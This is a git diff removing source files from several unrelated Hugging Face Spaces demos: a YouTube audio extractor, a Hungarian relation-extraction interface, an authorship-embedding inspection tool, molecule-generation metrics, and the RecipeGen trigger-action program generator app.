-parser.add_argument('person', type=str, help='the name of the person speaking') -parser.add_argument('-s', '--start-time', type=float, default=0, help='the start time in minutes for the extracted audio (default: 0)') -parser.add_argument('-d', '--duration', type=int, help='the duration in seconds for the extracted audio (default: 60)') - - -# 200 seconds seems to be max duration for single clips -def extract_audio(url: str, label: str, start_minute: float = 0, duration: int = 200): - - # Download the YouTube video - youtube_object = YouTube(url) - stream = youtube_object.streams.first() - video_path = Path(stream.download(skip_existing=True)) - - # Convert start time to seconds - start_time_seconds = int(start_minute * 60) - - # Format the start time in HH:MM:SS.mmm format - start_time_formatted = str(datetime.timedelta(seconds=start_time_seconds)) - start_time_formatted = start_time_formatted[:11] + start_time_formatted[12:] - - # Set the output path using the audio file name - output_path = video_path.parent / f"{label}.wav" - - # Run ffmpeg to extract the audio - cmd = ['ffmpeg', '-y', '-i', str(video_path), '-ss', start_time_formatted] - if duration is not None: - # Format the duration in HH:MM:SS.mmm format - duration_formatted = str(datetime.timedelta(seconds=duration)) - duration_formatted = duration_formatted[:11] + duration_formatted[12:] - cmd += ['-t', duration_formatted] - cmd += ['-q:a', '0', '-map', 'a', str(output_path)] - subprocess.run(cmd) - - # remove the extra .3gpp file that is created: - for file in os.listdir(video_path.parent): - if file.endswith(".3gpp"): - os.remove(os.path.join(video_path.parent, file)) - - return output_path - -if __name__ == '__main__': - - # Parse the arguments - args = parser.parse_args() - - # Extract the audio - extract_audio(args.url, args.person, args.start_time, args.duration) \ No newline at end of file diff --git a/spaces/huspacy/example-applications/examples/relation.py b/spaces/huspacy/example-applications/examples/relation.py deleted file mode 100644 index 09a6e5962f658381b053fd5573815ad671a2eccc..0000000000000000000000000000000000000000 --- a/spaces/huspacy/example-applications/examples/relation.py +++ /dev/null @@ -1,53 +0,0 @@ -import gradio as gr -import pandas as pd - -from examples.common import NLP -from resources import triples - - -def process(text: str) -> pd.DataFrame: - doc = NLP(text) - tuples_to_list = list() - - tuples = triples.subject_verb_object_triples(doc) - if tuples: - tuples_to_list = list(tuples) - - subject = "" - verb = "" - object = "" - - if len(tuples_to_list) == 0: - return pd.DataFrame([["-", "-", "-"]], columns=['Subject', 'Verb', 'Object']) - - for sub_multiple in tuples_to_list[0][0]: - subject += str(sub_multiple) + ", " - subject = subject[:-2] - for verb_multiple in tuples_to_list[0][1]: - verb += str(verb_multiple) + ", " - verb = verb[:-2] - for obj_multiple in tuples_to_list[0][2]: - object += str(obj_multiple) + ", " - object = object[:-2] - - relation_list = [[subject, verb, object]] - - return pd.DataFrame(relation_list, columns=['Subject', 'Verb', 'Object']) - - -EXAMPLES = [ - "Anna éppen most házat épít magának.", - "Noémi gulyáslevest szeret főzni, ha éhes.", - "Balázs jéghideg helyi ananászlevet ivott Hawaii fehér homokos partján.", - "Júliska fagyit árul a nyáron teljes állásban.", - "Einstein megmutatta a házát építés közben.", - "Hawking nyilatkozott egy levelet, miszerint a felfedezései az élete legizgalmasabb eseményei voltak." -] - -demo = gr.Interface( - fn=process, - inputs=gr.Textbox(value=EXAMPLES[0], lines=10, label="Input text", show_label=True), - outputs=gr.DataFrame(label="Keywords", show_label=False, max_cols=3, max_rows=1), - examples=EXAMPLES, - cache_examples=False, -) diff --git a/spaces/hv68/sample_tool_1/app.py b/spaces/hv68/sample_tool_1/app.py deleted file mode 100644 index 99a0bd777e0631efe97e53a29f9bc7c10bdb6222..0000000000000000000000000000000000000000 --- a/spaces/hv68/sample_tool_1/app.py +++ /dev/null @@ -1,237 +0,0 @@ -import streamlit as st -import pandas as pd -import sys -import os -from datasets import load_from_disk -# from st_aggrid import AgGrid, GridOptionsBuilder, GridUpdateMode -from sklearn.metrics.pairwise import cosine_similarity -import numpy as np -import time -from annotated_text import annotated_text - - -ABSOLUTE_PATH = os.path.dirname(__file__) -ASSETS_PATH = os.path.join(ABSOLUTE_PATH, 'model_assets') - - -from nltk.data import find -import nltk -import gensim - -@st.cache(suppress_st_warning=True, allow_output_mutation=True) -def get_embed_model(): - nltk.download("word2vec_sample") - word2vec_sample = str(find('models/word2vec_sample/pruned.word2vec.txt')) - - model = gensim.models.KeyedVectors.load_word2vec_format(word2vec_sample, binary=False) - return model - -@st.cache(suppress_st_warning=True, allow_output_mutation=True) -def get_top_n_closest(query_word, candidate, n): - model = get_embed_model() - t = time.time() - p_c = preprocess_text(candidate) - similarity = [] - t = time.time() - for i in p_c: - try: - similarity.append(model.similarity(query_word, i)) - except: - similarity.append(0) - top_n = min(len(p_c), n) - t = time.time() - sorted = (-1*np.array(similarity)).argsort()[:top_n] - top = [p_c[i] for i in sorted] - return top - -@st.cache(suppress_st_warning=True, allow_output_mutation=True) -def annotate_text(text, words): - annotated = [text] - for word in words: - for i in range(len(annotated)): - if type(annotated[i]) != str: - continue - string = annotated[i] - try: - index = string.index(word) - except: - continue - first = string[:index] - second = (string[index:index+len(word)],'SIMILAR') - third = string[index+len(word):] - annotated = annotated[:i] + [first, second, third] + annotated[i+1:] - return tuple(annotated) - - -@st.cache(suppress_st_warning=True, allow_output_mutation=True) -def preprocess_text(s): - return list(filter(lambda x: x!= '', (''.join(c if c.isalnum() or c == ' ' else ' ' for c in s)).split(' '))) - -@st.cache(suppress_st_warning=True, allow_output_mutation=True) -def get_pairwise_distances(model): - df = pd.read_csv(f"{ASSETS_PATH}/{model}/pairwise_distances.csv").set_index('index') - return df - -@st.cache(suppress_st_warning=True, allow_output_mutation=True) -def get_pairwise_distances_chunked(model, chunk): - # for df in pd.read_csv(f"{ASSETS_PATH}/{model}/pairwise_distances.csv", chunksize = 16): - # print(df.iloc[0]['queries']) - # if chunk == int(df.iloc[0]['queries']): - # return df - return get_pairwise_distances(model) -@st.cache(suppress_st_warning=True, allow_output_mutation=True) -def get_query_strings(): - df = pd.read_json(f"{ASSETS_PATH}/IUR_Reddit_test_queries_english.jsonl", lines = True) - df['index'] = df.reset_index().index - return df - # df['partition'] = df['index']%100 - # df.to_parquet(f"{ASSETS_PATH}/IUR_Reddit_test_queries_english.parquet", index = 'index', partition_cols = 'partition') - - # return pd.read_parquet(f"{ASSETS_PATH}/IUR_Reddit_test_queries_english.parquet", columns=['fullText', 'index', 'authorIDs']) -@st.cache(suppress_st_warning=True, allow_output_mutation=True) -def get_candidate_strings(): - df = pd.read_json(f"{ASSETS_PATH}/IUR_Reddit_test_candidates_english.jsonl", lines = True) - df['i'] = df['index'] - df = df.set_index('i') - # df['index'] = df.reset_index().index - - return df - # df['partition'] = df['index']%100 - # df.to_parquet(f"{ASSETS_PATH}/IUR_Reddit_test_candidates_english.parquet", index = 'index', partition_cols = 'partition') - # return pd.read_parquet(f"{ASSETS_PATH}/IUR_Reddit_test_candidates_english.parquet", columns=['fullText', 'index', 'authorIDs']) -@st.cache(suppress_st_warning=True, allow_output_mutation=True) -def get_embedding_dataset(model): - data = load_from_disk(f"{ASSETS_PATH}/{model}/embedding") - return data -@st.cache(suppress_st_warning=True, allow_output_mutation=True) -def get_bad_queries(model): - df = get_query_strings().iloc[list(get_pairwise_distances(model)['queries'].unique())][['fullText', 'index', 'authorIDs']] - return df -@st.cache(suppress_st_warning=True, allow_output_mutation=True) -def get_gt_candidates(model, author): - gt_candidates = get_candidate_strings() - df = gt_candidates[gt_candidates['authorIDs'] == author] - return df -@st.cache(suppress_st_warning=True, allow_output_mutation=True) -def get_candidate_text(l): - return get_candidate_strings().at[l,'fullText'] - -@st.cache(suppress_st_warning=True, allow_output_mutation=True) -def get_annotated_text(text, word, pos): - print("here", word, pos) - start= text.index(word, pos) - end = start+len(word) - return (text[:start], (text[start:end ], 'SELECTED'), text[end:]), end - -# class AgGridBuilder: -# __static_key = 0 -# def build_ag_grid(table, display_columns): -# AgGridBuilder.__static_key += 1 -# options_builder = GridOptionsBuilder.from_dataframe(table[display_columns]) -# options_builder.configure_pagination(paginationAutoPageSize=False, paginationPageSize=10) -# options_builder.configure_selection(selection_mode= 'single', pre_selected_rows = [0]) -# options = options_builder.build() -# return AgGrid(table, gridOptions = options, fit_columns_on_grid_load=True, key = AgGridBuilder.__static_key, reload_data = True, update_mode = GridUpdateMode.SELECTION_CHANGED | GridUpdateMode.VALUE_CHANGED) - -if __name__ == '__main__': - st.set_page_config(layout="wide") - - models = filter(lambda file_name: os.path.isdir(f"{ASSETS_PATH}/{file_name}") and not file_name.endswith(".parquet"), os.listdir(ASSETS_PATH)) - - with st.sidebar: - current_model = st.selectbox( - "Select Model to analyze", - models - ) - - pairwise_distances = get_pairwise_distances(current_model) - embedding_dataset = get_embedding_dataset(current_model) - - candidate_string_grid = None - gt_candidate_string_grid = None - with st.container(): - t1 = time.time() - st.title("Full Text") - col1, col2 = st.columns([14, 2]) - t2 = time.time() - query_table = get_bad_queries(current_model) - t3 = time.time() - print(query_table) - with col2: - index = st.number_input('Enter Query number to inspect', min_value = 0, max_value = query_table.shape[0], step = 1) - query_text = query_table.loc[index]['fullText'] - preprocessed_query_text = preprocess_text(query_text) - text_highlight_index = st.number_input('Enter word #', min_value = 0, max_value = len(preprocessed_query_text), step = 1) - query_index = int(query_table.iloc[index]['index']) - - with col1: - if 'pos_highlight' not in st.session_state or text_highlight_index == 0: - st.session_state['pos_highlight'] = text_highlight_index - st.session_state['pos_history'] = [0] - - if st.session_state['pos_highlight'] > text_highlight_index: - st.session_state['pos_history'] = st.session_state['pos_history'][:-2] - if len(st.session_state['pos_history']) == 0: - st.session_state['pos_history'] = [0] - print("pos", st.session_state['pos_history'], st.session_state['pos_highlight'], text_highlight_index) - anotated_text_, pos = get_annotated_text(query_text, preprocessed_query_text[text_highlight_index-1], st.session_state['pos_history'][-1]) if text_highlight_index >= 1 else ((query_text), 0) - if st.session_state['pos_highlight'] < text_highlight_index: - st.session_state['pos_history'].append(pos) - st.session_state['pos_highlight'] = text_highlight_index - annotated_text(*anotated_text_) - # annotated_text("Lol, this" , ('guy', 'SELECTED') , "is such a PR chameleon. \n\n In the Chan Zuckerberg Initiative announcement, he made it sound like he was giving away all his money to charity or . http://www.businessinsider.in/Mark-Zuckerberg-says-hes-giving-99-of-his-Facebook-shares-45-billion-to-charity/articleshow/50005321.cms Apparently, its just a VC fund. And there are still people out there who believe Facebook.org was an initiative to bring Internet to the poor.") - t4 = time.time() - - print(f"query time query text: {t3-t2}, total time: {t4-t1}") - with st.container(): - st.title("Top 16 Recommended Candidates") - col1, col2, col3 = st.columns([10, 4, 2]) - rec_candidates = pairwise_distances[pairwise_distances["queries"]==query_index]['candidates'] - print(rec_candidates) - l = list(rec_candidates) - with col3: - candidate_rec_index = st.number_input('Enter recommended candidate number to inspect', min_value = 0, max_value = len(l), step = 1) - print("l:",l, query_index) - pairwise_candidate_index = int(l[candidate_rec_index]) - with col1: - st.header("Text") - t1 = time.time() - candidate_text = get_candidate_text(pairwise_candidate_index) - - if st.session_state['pos_highlight'] == 0: - annotated_text(candidate_text) - else: - top_n_words_to_highlight = get_top_n_closest(preprocessed_query_text[text_highlight_index-1], candidate_text, 4) - print("TOPN", top_n_words_to_highlight) - annotated_text(*annotate_text(candidate_text, top_n_words_to_highlight)) - - t2 = time.time() - with col2: - st.header("Cosine Distance") - st.write(float(pairwise_distances[\ - ( pairwise_distances['queries'] == query_index ) \ - & - ( pairwise_distances['candidates'] == pairwise_candidate_index)]['distances'])) - print(f"candidate string retreival: {t2-t1}") - with st.container(): - t1 = time.time() - st.title("Candidates With Same Authors As Query") - col1, col2, col3 = st.columns([10, 4, 2]) - t2 = time.time() - gt_candidates = get_gt_candidates(current_model, query_table.iloc[query_index]['authorIDs'][0]) - t3 = time.time() - - with col3: - candidate_index = st.number_input('Enter ground truthnumber to inspect', min_value = 0, max_value = gt_candidates.shape[0], step = 1) - print(gt_candidates.head()) - gt_candidate_index = int(gt_candidates.iloc[candidate_index]['index']) - with col1: - st.header("Text") - st.write(gt_candidates.iloc[candidate_index]['fullText']) - with col2: - t4 = time.time() - st.header("Cosine Distance") - indices = list(embedding_dataset['candidates']['index']) - st.write(1-cosine_similarity(np.array([embedding_dataset['queries'][query_index]['embedding']]), np.array([embedding_dataset['candidates'][indices.index(gt_candidate_index)]['embedding']]))[0,0]) - t5 = time.time() - print(f"find gt candidates: {t3-t2}, find cosine: {t5-t4}, total: {t5-t1}") diff --git a/spaces/igashov/DiffLinker/src/metrics.py b/spaces/igashov/DiffLinker/src/metrics.py deleted file mode 100644 index efba0c8e3d316695a53d8ab1db0ee746ffbc13fe..0000000000000000000000000000000000000000 --- a/spaces/igashov/DiffLinker/src/metrics.py +++ /dev/null @@ -1,167 +0,0 @@ -import numpy as np - -from rdkit import Chem -from rdkit.Chem import AllChem -from src import const -from src.molecule_builder import get_bond_order -from scipy.stats import wasserstein_distance - -from pdb import set_trace - - -def is_valid(mol): - try: - Chem.SanitizeMol(mol) - except ValueError: - return False - return True - - -def is_connected(mol): - try: - mol_frags = Chem.GetMolFrags(mol, asMols=True) - except Chem.rdchem.AtomValenceException: - return False - if len(mol_frags) != 1: - return False - return True - - -def get_valid_molecules(molecules): - valid = [] - for mol in molecules: - if is_valid(mol): - valid.append(mol) - return valid - - -def get_connected_molecules(molecules): - connected = [] - for mol in molecules: - if is_connected(mol): - connected.append(mol) - return connected - - -def get_unique_smiles(valid_molecules): - unique = set() - for mol in valid_molecules: - unique.add(Chem.MolToSmiles(mol)) - return list(unique) - - -def get_novel_smiles(unique_true_smiles, unique_pred_smiles): - return list(set(unique_pred_smiles).difference(set(unique_true_smiles))) - - -def compute_energy(mol): - mp = AllChem.MMFFGetMoleculeProperties(mol) - energy = AllChem.MMFFGetMoleculeForceField(mol, mp, confId=0).CalcEnergy() - return energy - - -def wasserstein_distance_between_energies(true_molecules, pred_molecules): - true_energy_dist = [] - for mol in true_molecules: - try: - energy = compute_energy(mol) - true_energy_dist.append(energy) - except: - continue - - pred_energy_dist = [] - for mol in pred_molecules: - try: - energy = compute_energy(mol) - pred_energy_dist.append(energy) - except: - continue - - if len(true_energy_dist) > 0 and len(pred_energy_dist) > 0: - return wasserstein_distance(true_energy_dist, pred_energy_dist) - else: - return 0 - - -def compute_metrics(pred_molecules, true_molecules): - if len(pred_molecules) == 0: - return { - 'validity': 0, - 'validity_and_connectivity': 0, - 'validity_as_in_delinker': 0, - 'uniqueness': 0, - 'novelty': 0, - 'energies': 0, - } - - # Passing rdkit.Chem.Sanitize filter - true_valid = get_valid_molecules(true_molecules) - pred_valid = get_valid_molecules(pred_molecules) - validity = len(pred_valid) / len(pred_molecules) - - # Checking if molecule consists of a single connected part - true_valid_and_connected = get_connected_molecules(true_valid) - pred_valid_and_connected = get_connected_molecules(pred_valid) - validity_and_connectivity = len(pred_valid_and_connected) / len(pred_molecules) - - # Unique molecules - true_unique = get_unique_smiles(true_valid_and_connected) - pred_unique = get_unique_smiles(pred_valid_and_connected) - uniqueness = len(pred_unique) / len(pred_valid_and_connected) if len(pred_valid_and_connected) > 0 else 0 - - # Novel molecules - pred_novel = get_novel_smiles(true_unique, pred_unique) - novelty = len(pred_novel) / len(pred_unique) if len(pred_unique) > 0 else 0 - - # Difference between Energy distributions - energies = wasserstein_distance_between_energies(true_valid_and_connected, pred_valid_and_connected) - - return { - 'validity': validity, - 'validity_and_connectivity': validity_and_connectivity, - 'uniqueness': uniqueness, - 'novelty': novelty, - 'energies': energies, - } - - -# def check_stability(positions, atom_types): -# assert len(positions.shape) == 2 -# assert positions.shape[1] == 3 -# x = positions[:, 0] -# y = positions[:, 1] -# z = positions[:, 2] -# -# nr_bonds = np.zeros(len(x), dtype='int') -# for i in range(len(x)): -# for j in range(i + 1, len(x)): -# p1 = np.array([x[i], y[i], z[i]]) -# p2 = np.array([x[j], y[j], z[j]]) -# dist = np.sqrt(np.sum((p1 - p2) ** 2)) -# atom1, atom2 = const.IDX2ATOM[atom_types[i].item()], const.IDX2ATOM[atom_types[j].item()] -# order = get_bond_order(atom1, atom2, dist) -# nr_bonds[i] += order -# nr_bonds[j] += order -# nr_stable_bonds = 0 -# for atom_type_i, nr_bonds_i in zip(atom_types, nr_bonds): -# possible_bonds = const.ALLOWED_BONDS[const.IDX2ATOM[atom_type_i.item()]] -# if type(possible_bonds) == int: -# is_stable = possible_bonds == nr_bonds_i -# else: -# is_stable = nr_bonds_i in possible_bonds -# nr_stable_bonds += int(is_stable) -# -# molecule_stable = nr_stable_bonds == len(x) -# return molecule_stable, nr_stable_bonds, len(x) -# -# -# def count_stable_molecules(one_hot, x, node_mask): -# stable_molecules = 0 -# for i in range(len(one_hot)): -# mol_size = node_mask[i].sum() -# atom_types = one_hot[i][:mol_size, :].argmax(dim=1).detach().cpu() -# positions = x[i][:mol_size, :].detach().cpu() -# stable, _, _ = check_stability(positions, atom_types) -# stable_molecules += int(stable) -# -# return stable_molecules diff --git a/spaces/ilmhona/api/__init__.py b/spaces/ilmhona/api/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/imamnurby/RecipeGen/app.py b/spaces/imamnurby/RecipeGen/app.py deleted file mode 100644 index b570dc56fc3acdeb1e2d29b76a2731d35a978444..0000000000000000000000000000000000000000 --- a/spaces/imamnurby/RecipeGen/app.py +++ /dev/null @@ -1,543 +0,0 @@ -import pandas as pd -from transformers import AutoTokenizer -from transformers import RobertaTokenizer, EncoderDecoderModel -import gradio as gr -import string -from utils import (get_metadata, - append_prefix, - append_suffix, - process_field) - -metadata = "metadata.csv" -channel_dict, function_dict_trigger, function_dict_action, field_mapping, valid_field, channel_to_function_dict = get_metadata(path=metadata) - -tokenizer = RobertaTokenizer.from_pretrained("imamnurby/rob2rand_merged_w_prefix_c_fc_field") - -model_oneshot = EncoderDecoderModel.from_pretrained("imamnurby/rob2rand_merged_w_prefix_c_fc_field") -model_interactive = EncoderDecoderModel.from_pretrained("imamnurby/rob2rand_merged_w_prefix_c_fc_interactive") - - -### -# INTERACTIVE GENERATION FUNCTIONS -### -def return_same(input_desc): - return input_desc - -def update_dropdown_trig_ch(df_result): - list_result = [] - answer = '' - for ind in df_result.index: - if str(df_result['No.'][ind]) != '': - answer = str(df_result['No.'][ind])+ ' - '+ str(df_result['Trigger Channel'][ind]) - list_result.append(answer) - return gr.Dropdown.update(choices=list_result) - -def update_dropdown_trig_func(df_result): - list_result = [] - answer = '' - for ind in df_result.index: - if str(df_result['No.'][ind]) != '': - answer = str(df_result['No.'][ind])+ ' - '+ str(df_result['Trigger Function'][ind]) - list_result.append(answer) - return gr.Dropdown.update(choices=list_result) - -def update_dropdown_action_ch(df_result): - list_result = [] - answer = '' - for ind in df_result.index: - if str(df_result['No.'][ind]) != '': - answer = str(df_result['No.'][ind])+ ' - '+ str(df_result['Action Channel'][ind]) - list_result.append(answer) - return gr.Dropdown.update(choices=list_result) - -def update_dropdown_action_func(df_result): - list_result = [] - answer = '' - for ind in df_result.index: - if str(df_result['No.'][ind]) != '': - answer = str(df_result['No.'][ind])+ ' - '+ str(df_result['Action Function'][ind]) - list_result.append(answer) - return gr.Dropdown.update(choices=list_result) - -def set_trigger_ch(df_result, string_chosen): - index_chosen = string_chosen[0:1] - index_chosen = int(index_chosen) - return gr.Textbox.update(value = df_result.iloc[index_chosen-1]["Trigger Channel"]) - -def set_trig_func(df_result, string_chosen): - index_chosen = string_chosen[0:1] - index_chosen = int(index_chosen) - return gr.Textbox.update(value = df_result.iloc[index_chosen-1]["Trigger Function"]) - -def set_action_ch(df_result, string_chosen): - index_chosen = string_chosen[0:1] - index_chosen = int(index_chosen) - return gr.Textbox.update(value = df_result.iloc[index_chosen-1]["Action Channel"]) - -def set_final_result(tf, df_result, string_chosen): - index_chosen = string_chosen[0:1] - index_chosen = int(index_chosen) - af = df_result.iloc[index_chosen-1]["Action Function"] - tf_field = field_mapping.get(tf, "()") - tf = tf + tf_field - af_field = field_mapping.get(af, "()") - af = af + af_field - df_dict = {"Trigger": [tf], - "Action": [af]} - return pd.DataFrame(df_dict) - -def generate_preds_tc(input_desc, n_beams_interactive): - count_arr = [] - decoded_preds=[] - descriptions=[] - if input_desc!='': - desc = input_desc.lower() - desc = append_prefix(desc=desc, - prefix= "GENERATE TRIGGER CHANNEL ") - - input_ids = tokenizer.encode(desc, return_tensors='pt') - - preds = model_interactive.generate(input_ids, - max_length=200, - num_beams=n_beams_interactive, - num_return_sequences=n_beams_interactive, - early_stopping=True) - count = 0 - for item in preds: - temp_pred = (tokenizer.decode(item, skip_special_tokens=True)) - if temp_pred in channel_dict.keys(): - count = count + 1 - count_arr.append(count) - decoded_preds.append(temp_pred) - temp_desc = channel_dict.get(temp_pred, "null") - descriptions.append(temp_desc) - - df = {'No.':count_arr, - 'Trigger Channel': decoded_preds, - 'Description': descriptions} - return pd.DataFrame(df) - -def generate_preds_tf(input_desc, n_beams_interactive, selected_tc): - count_arr = [] - decoded_preds=[] - descriptions=[] - if input_desc!='' and selected_tc!='': - desc = input_desc.lower() - desc = append_prefix(desc=desc, - prefix="GENERATE TRIGGER FUNCTION ") - - desc = append_suffix(desc=desc, - suffix=f" {selected_tc}") - - input_ids = tokenizer.encode(desc, return_tensors='pt') - - preds = model_interactive.generate(input_ids, - max_length=200, - num_beams=n_beams_interactive, - num_return_sequences=n_beams_interactive, - early_stopping=True) - count = 0 - for item in preds: - temp_pred = (tokenizer.decode(item, skip_special_tokens=True)) - if temp_pred in function_dict_trigger.keys(): - temp_desc = function_dict_trigger.get(temp_pred, "null") - if selected_tc in temp_pred: - count = count + 1 - count_arr.append(count) - decoded_preds.append(temp_pred) - descriptions.append(temp_desc) - - df = {'No.': count_arr, - 'Trigger Function': decoded_preds, - 'Description': descriptions} - return pd.DataFrame(df) - -def generate_preds_ac(input_desc, n_beams_interactive, selected_tc, selected_tf): - count_arr = [] - decoded_preds=[] - descriptions=[] - if input_desc!='' and selected_tf!='': - desc = input_desc.lower() - desc = append_prefix(desc=desc, - prefix= "GENERATE ACTION CHANNEL ") - - desc = append_suffix(desc=desc, - suffix=f" {selected_tc} {selected_tf}") - - input_ids = tokenizer.encode(desc, return_tensors='pt') - - preds = model_interactive.generate(input_ids, - max_length=200, - num_beams=n_beams_interactive, - num_return_sequences=n_beams_interactive, - early_stopping=True) - count = 0 - for item in preds: - temp_pred = (tokenizer.decode(item, skip_special_tokens=True)) - if temp_pred in channel_dict.keys(): - count = count + 1 - count_arr.append(count) - decoded_preds.append(temp_pred) - temp_desc = channel_dict.get(temp_pred, "null") - descriptions.append(temp_desc) - - df = {'No.':count_arr, - 'Action Channel': decoded_preds, - 'Description': descriptions} - return pd.DataFrame(df) - -def generate_preds_af(input_desc, n_beams_interactive, selected_tc, selected_tf, selected_ac): - count_arr = [] - decoded_preds=[] - descriptions=[] - if input_desc!='' and selected_ac!='': - desc = input_desc.lower() - desc = append_prefix(desc=desc, - prefix="GENERATE TRIGGER FUNCTION ") - - desc = append_suffix(desc=desc, - suffix=f" {selected_tc} {selected_tf} {selected_ac}") - - input_ids = tokenizer.encode(desc, return_tensors='pt') - - preds = model_interactive.generate(input_ids, - max_length=200, - num_beams=n_beams_interactive, - num_return_sequences=n_beams_interactive, - early_stopping=True) - count = 0 - for item in preds: - temp_pred = (tokenizer.decode(item, skip_special_tokens=True)) - if temp_pred in function_dict_action.keys(): - temp_desc = function_dict_action.get(temp_pred, "null") - - if selected_ac in temp_pred: - count = count + 1 - count_arr.append(count) - decoded_preds.append(temp_pred) - descriptions.append(temp_desc) - - df = {'No.':count_arr, - 'Action Function': decoded_preds, - 'Description': descriptions} - df = pd.DataFrame(df) - df.index.names = ['Ranking'] - return df -### - -### -# ONESHOT GENERATION FUNCTIONS -### -def generate_oneshot(input_desc, n_beams_oneshot): - trigger = [] - trigger_desc = [] - action = [] - action_desc = [] - if input_desc!='': - desc = input_desc.lower() - prefix="GENERATE ON THE FIELD-LEVEL GRANULARITY " - desc = append_prefix(desc=desc, - prefix=prefix) - - input_ids = tokenizer.encode(desc, return_tensors='pt') - - # activate beam search and early_stopping - preds = model_oneshot.generate(input_ids, - max_length=200, - num_beams=n_beams_oneshot, - num_return_sequences=n_beams_oneshot, - early_stopping=True) - - decoded_preds = [] - for item in preds: - decoded_preds.append(tokenizer.decode(item, skip_special_tokens=True)) - - for item in decoded_preds: - invalid_field = False - splitted_items = item.split("") - processed = [] - if len(splitted_items)==6: - for idx, subitem in enumerate(splitted_items): - if idx!=2 or idx!=4: - subitem = subitem.strip() - processed.append(subitem) - assert(len(processed)==6) - temp_tf = processed[1] - temp_af = processed[4] - - temp_tf_field = process_field(processed[2]) - for field in temp_tf_field: - if field not in valid_field: - invalid_field = True - break - if invalid_field: - continue - temp_tf_field = "(" + ", ".join(temp_tf_field) + ")" - - temp_af_field = process_field(processed[-1]) - for field in temp_af_field: - if field not in valid_field: - invalid_field = True - break - if invalid_field: - continue - temp_af_field = "(" + ", ".join(temp_af_field) + ")" - - if temp_tf in function_dict_trigger.keys() and temp_af in function_dict_action.keys(): - temp_tf_desc = function_dict_trigger.get(temp_tf) - temp_af_desc = function_dict_action.get(temp_af) - - temp_tf = temp_tf + temp_tf_field - temp_af = temp_af + temp_af_field - - trigger.append(temp_tf) - trigger_desc.append(temp_tf_desc) - - action.append(temp_af) - action_desc.append(temp_af_desc) - - df = {"Trigger": trigger, - "Action": action, - "Trigger Description": trigger_desc, - "Action Description": action_desc} - return pd.DataFrame(df) -### - -### -# DISCOVER FUNCTIONS -### -def generate_channel(input_desc, n_beams_discover): - trigger = [] - trigger_func = [] - trigger_desc = [] - action = [] - action_func = [] - action_desc = [] - if input_desc!='': - desc = input_desc.lower() - prefix="GENERATE CHANNEL ONLY WITHOUT FUNCTION " - desc = append_prefix(desc=desc, - prefix=prefix) - - input_ids = tokenizer.encode(desc, return_tensors='pt') - - # activate beam search and early_stopping - preds = model_oneshot.generate(input_ids, - max_length=200, - num_beams=n_beams_discover, - num_return_sequences=n_beams_discover, - early_stopping=True) - - decoded_preds = [] - for item in preds: - decoded_preds.append(tokenizer.decode(item, skip_special_tokens=True)) - - for item in decoded_preds: - channels = item.split("") - channels = [ch.strip() for ch in channels] - if len(channels)==2: - if channels[0] in channel_dict.keys() and channels[1] in channel_dict.keys() and channels[0] in channel_to_function_dict.keys() and channels[1] in channel_to_function_dict.keys(): - temp_tc_desc = channel_dict.get(channels[0]) - trigger_desc.append(temp_tc_desc) - trigger.append(channels[0]) - trigger_func.append(channel_to_function_dict.get(channels[0])) - - temp_ac_desc = channel_dict.get(channels[1]) - action_desc.append(temp_ac_desc) - action.append(channels[1]) - action_func.append(channel_to_function_dict.get(channels[1])) - - df_trigger = pd.DataFrame({"Trigger": trigger, - "Available Functions": trigger_func, - "Trigger Description": trigger_desc}) - - df_action = pd.DataFrame({"Action": action, - "Available Functions": action_func, - "Action Description": action_desc}) - - df_trigger.drop_duplicates(inplace=True) - df_action.drop_duplicates(inplace=True) - - return pd.DataFrame(df_trigger), pd.DataFrame(df_action) - -### -# MAIN GRADIO APP -### -demo = gr.Blocks() -with demo: - gr.Markdown("

    RecipeGen++: An Automated Trigger Action Programs (TAPs) Generator

    ") - # gr.Markdown("This demo allows you to generate TAPs using functionality description described in English. You can learn the working detail of our tool from our paper") - gr.Markdown("

    What is TAP?

    ") - gr.Markdown(""" - TAPs or Trigger Action Programs are event-driven rules used to automate smart devices and/or internet services. - TAPs are written in the form of "IF a {trigger} is satisfied then execute an {action}, where the {trigger} and the {action} correspond to API calls. - TAPs have been used in various use cases, ranging from the home monitoring system to business workflow automation. - """) - gr.Markdown("

    What is RecipeGen++?

    ") - gr.Markdown(""" - *RecipeGen++* is a deep learning-based tool that can assist end-users to generate TAPs using natural language description. - End-users can describe the functionality of the intended TAP, then *RecipeGen++* will generate the TAP candidates based on the given description. - """) - gr.Markdown("

    Working Mode

    ") - gr.Markdown(""" - - Interactive: generate a TAP using a step-by-step wizard - - One-Click: generate a TAP using the one-click button - - Functionality Discovery: discover relevant functionalities from channels with similar functionalities - """) - with gr.Tabs(): - with gr.TabItem("Interactive"): - gr.Markdown("

    Instructions for Interactive Mode

    ") - gr.Markdown("""1. There are 5 generation steps, i.e., generating trigger channel, trigger function, action channel, action function, and the final TAP. - 2. **[STEP 1]** Describe the functionality in the `Functionality Description` text box. Click the `Generate Trigger Channel` button. The channel candidates and their descriptions will show up in the `Trigger Channel Results` table. - 3. **[STEP 2]** Select a trigger channel from the dropdown `Select the Trigger Channel`. Click the `Generate Trigger Function` button. The function candidates and their descriptions will show up in the `Trigger Function Results` table. - 4. **[STEP 3]** Select a trigger function from the dropdown `Select the Trigger Function`. Click the `Generate Action Channel` button. The channel candidates and their descriptions will show up in the `Action Channel Results` table. - 5. **[STEP 4]** Select an action channel from the dropdown `Select the Action Channel`. Click the `Generate Action Function` button. The function candidates and their descriptions will show up in the `Action Function Results` table. - 6. **[STEP 5]** Select an action function from the `Select the Action Function` to generate the final TAP.""") - gr.Markdown(""" NOTE: You can control how many sequences are returned by tuning the `Beam Width` slider. A larger value will cause a longer generation time. - """) - - with gr.Box(): - with gr.Column(): - gr.Markdown("You can describe your own functionality directly in the `Functionality Description` text box or try a description sample from the dropdown below:") - dropdown_example = gr.Dropdown(type ="value", - choices = ["Log to my spreadsheet if motion is detected in the living room","When I am not home, let me know when any motion is detected in my house", "Turn on my Philips lamp every sunset","Update my picture in Twitter when I change my profile picture in Facebook","Save in notes when I create a new bookmark"], - label = "Select a sample functionality descriptions") - button_use_example = gr.Button("Try this sample") - - with gr.Box(): - with gr.Column(): - - gr.Markdown("

    Step 1: Generate Trigger Channels

    ") - textbox_input = gr.Textbox(label="Functionality Description", placeholder="Describe the functionality here") - n_beams_interactive = gr.Slider(minimum=2, maximum=100, value=20, step=1, label="Beam Width") - button_generate_tc = gr.Button("Generate Trigger Channels") - - gr.Markdown("
